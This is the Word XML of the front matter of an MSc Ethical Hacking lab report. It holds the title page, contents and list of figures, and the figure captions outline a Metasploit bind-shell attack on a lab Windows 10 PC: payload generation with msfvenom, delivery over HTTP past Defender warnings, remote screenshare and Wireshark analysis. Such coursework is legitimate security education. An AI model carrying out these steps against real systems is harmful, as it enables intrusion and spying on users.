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1A2894" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059347E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16AC0A92" wp14:editId="27B1CA3D">
            <wp:extent cx="4853940" cy="1531620"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1952319249" name="Picture 1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319249" name="Picture 1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3940" cy="1531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936917" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14338175" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRPr="00FE718F" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE718F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>University of Wales Trinity Saint David</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA20C6" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRPr="00FE718F" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE718F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Welsh Institute of Sciences and Art (WISA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C81969" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRPr="006B41C7" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41C7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Simon Rees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B837D93" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRPr="006B41C7" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41C7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSc Cybersecurity and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E756597" w14:textId="77777777" w:rsidR="00383B7C" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41C7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ethical Hacking (ACC70033)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61260B" w14:textId="1B710276" w:rsidR="00383B7C" w:rsidRPr="00F651C8" w:rsidRDefault="00383B7C" w:rsidP="00383B7C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checkpoint 1: Metasploit Report and </w:t>
      </w:r>
      <w:r w:rsidR="008D0A66">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C72EFD" w14:textId="57002095" w:rsidR="00383B7C" w:rsidRDefault="005D2234" w:rsidP="005D2234">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2234">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AEED7C9" wp14:editId="77D903D2">
            <wp:extent cx="1882303" cy="2072820"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1075022238" name="Picture 1" descr="A blue and white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5022238" name="Picture 1" descr="A blue and white logo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882303" cy="2072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2F15C9" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186ACCB2" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D940F06" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3C196A" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD8DCE9" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9EA99A" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDAD06C" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C33F77" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268F4CCE" w14:textId="77777777" w:rsidR="008D0A66" w:rsidRDefault="008D0A66" w:rsidP="00383B7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F76AC0" w14:textId="77777777" w:rsidR="00184397" w:rsidRPr="00F651C8" w:rsidRDefault="00184397" w:rsidP="00184397">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F651C8">
        <w:lastRenderedPageBreak/>
        <w:t>Table of Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C710A8" w14:textId="77777777" w:rsidR="00184397" w:rsidRDefault="00184397" w:rsidP="00184397">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F651C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79EC25" w14:textId="09ECED91" w:rsidR="00184397" w:rsidRDefault="00B9333B" w:rsidP="00184397">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Overview of Me</w:t>
      </w:r>
      <w:r w:rsidR="006A5704">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2209C" w14:textId="25BA0A91" w:rsidR="006A5704" w:rsidRPr="00F651C8" w:rsidRDefault="006A5704" w:rsidP="00184397">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Functionalities and Capabilities of Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="003F229B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F650DBA" w14:textId="67609D6F" w:rsidR="00184397" w:rsidRDefault="00E30DFC" w:rsidP="00E670F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30DFC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reverse Shell and Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9D7BD" w14:textId="44698C02" w:rsidR="00E670F7" w:rsidRDefault="00E670F7" w:rsidP="00E670F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Usage of Reverse Shell and Bind </w:t>
      </w:r>
      <w:r w:rsidR="009001AA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D2684F" w14:textId="606F8490" w:rsidR="00EE1ED5" w:rsidRPr="00E670F7" w:rsidRDefault="00954B74" w:rsidP="00E670F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Creating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00954B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bind Shell with Meterpreter sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515397D" w14:textId="77777777" w:rsidR="005016FE" w:rsidRDefault="005016FE" w:rsidP="00C824E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C824E7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analysis of the Bind Shell Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771F650" w14:textId="1D3E92A0" w:rsidR="00FB0A5A" w:rsidRPr="00FB0A5A" w:rsidRDefault="00FB0A5A" w:rsidP="00FB0A5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Mitigation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7C977" w14:textId="2F92D332" w:rsidR="002A0D88" w:rsidRPr="00FC0257" w:rsidRDefault="00E71CC5" w:rsidP="0099190D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325578">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23505DE2" w14:textId="1FDE75C2" w:rsidR="00325578" w:rsidRPr="00FC0257" w:rsidRDefault="00FC0257" w:rsidP="003F26E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0257">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table of references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1FD3B" w14:textId="77777777" w:rsidR="002A0D88" w:rsidRDefault="002A0D88" w:rsidP="00325578">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FFCA2" w14:textId="7D9B822E" w:rsidR="001C68CE" w:rsidRDefault="005A6F5C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50072417" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1- Reverse Shell - Connection initiated by the Target PC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_Toc150072417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5</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="532BAF89" w14:textId="3D22E8E6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18" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2 - BIND Shell - Connection initiated by the Attack PC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_Toc150072418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6</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DFA0F0F" w14:textId="32834F55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19" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3 - Flowchart showing the process of carrying out the BIND Shell attack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_Toc150072419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8</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D2088B2" w14:textId="76E1EF26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20" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4 - Checking IP Address and creating working folder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_Toc150072420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10</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3428CAC3" w14:textId="031E1BE5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21" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5 - Using msfvenom meterpreter to generate the bind shell payload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_Toc150072421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10</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BF77A3A" w14:textId="1E4DC75B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22" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6 - Confirming that the bind.exe payload has been created and is located in the temp working folder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_Toc150072422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10</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0018BF51" w14:textId="3B926CBD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23" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7 - Running the http server on the Kali attack PC in the temp folder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_Toc150072423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11</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50703B66" w14:textId="27AA5BCE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24" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8 - On the Windows 10 PC - Browsing to the Kali attack PC on Port 8080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_Toc150072424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11</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CA3A200" w14:textId="715D7B47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25" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9 - Windows 10 Microsoft Defender warning that the file may not be safe and to ensure that it is trusted before opening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_Toc150072425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11</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C8AE1B2" w14:textId="1DB0ADCC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26" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10 - Once again Microsoft Defender blocking the bind.exe shell from running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_Toc150072426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12</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="670141B4" w14:textId="519CECD8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27" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11 - On the Kali PC - the HTTP log showing the bind.exe file being downloaded.  It took a few attempts!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_Toc150072427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12</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="364280A4" w14:textId="3F901BCB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28" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12 - Running the mfsconsole. This lab was carried out on Halloween, and therefore the reference to the Mummy.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_Toc150072428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13</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="304DDCC9" w14:textId="6CBE690C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29" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13 - Screenshare being set up via the mfsconsole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_Toc150072429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14</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="361BD041" w14:textId="1396B7A6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30" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14 - Screenshare in action - the Windows 10 PC desktop is visible from the Kali attack PC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_Toc150072430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14</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64112128" w14:textId="2B564FD3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31" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15 - The initial 3 way handshake being carried out - initiated by the Kali Attack PC on port 38891 to port 4444 on the Target PC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_Toc150072431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15</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0031E9AE" w14:textId="16D6C34A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32" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16 - Constant stream of traffic between the two PCs, windows size increases to 2102272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_Toc150072432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15</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15DE6C24" w14:textId="5FE5097D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33" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17 - New session initiated by Kali to 34.117.237.239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_Toc150072433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15</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10E74FD7" w14:textId="44ED0AD9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34" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18 - Filtering the Wireshark capture on tcp stream 0 to isolate the traffic between the Attacker and Target PCs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_Toc150072434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15</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14EE93C7" w14:textId="13EE9377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35" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19 - Graph displaying the traffic between the two PCs on tcp stream 0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_Toc150072435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16</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FA7E675" w14:textId="2B5F67AC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36" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20 - Wireshark trace showing packet 163 and subsequent packets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_Toc150072436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16</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0740E623" w14:textId="0DB7E451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37" w:history="1">
        <w:r w:rsidR="001C68CE" w:rsidRPr="0056146E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21 - Wireshark trace showing the Metasploit session being closed down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_Toc150072437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16</w:t>
        </w:r>
        <w:r w:rsidR="001C68CE">
          <w:rPr>
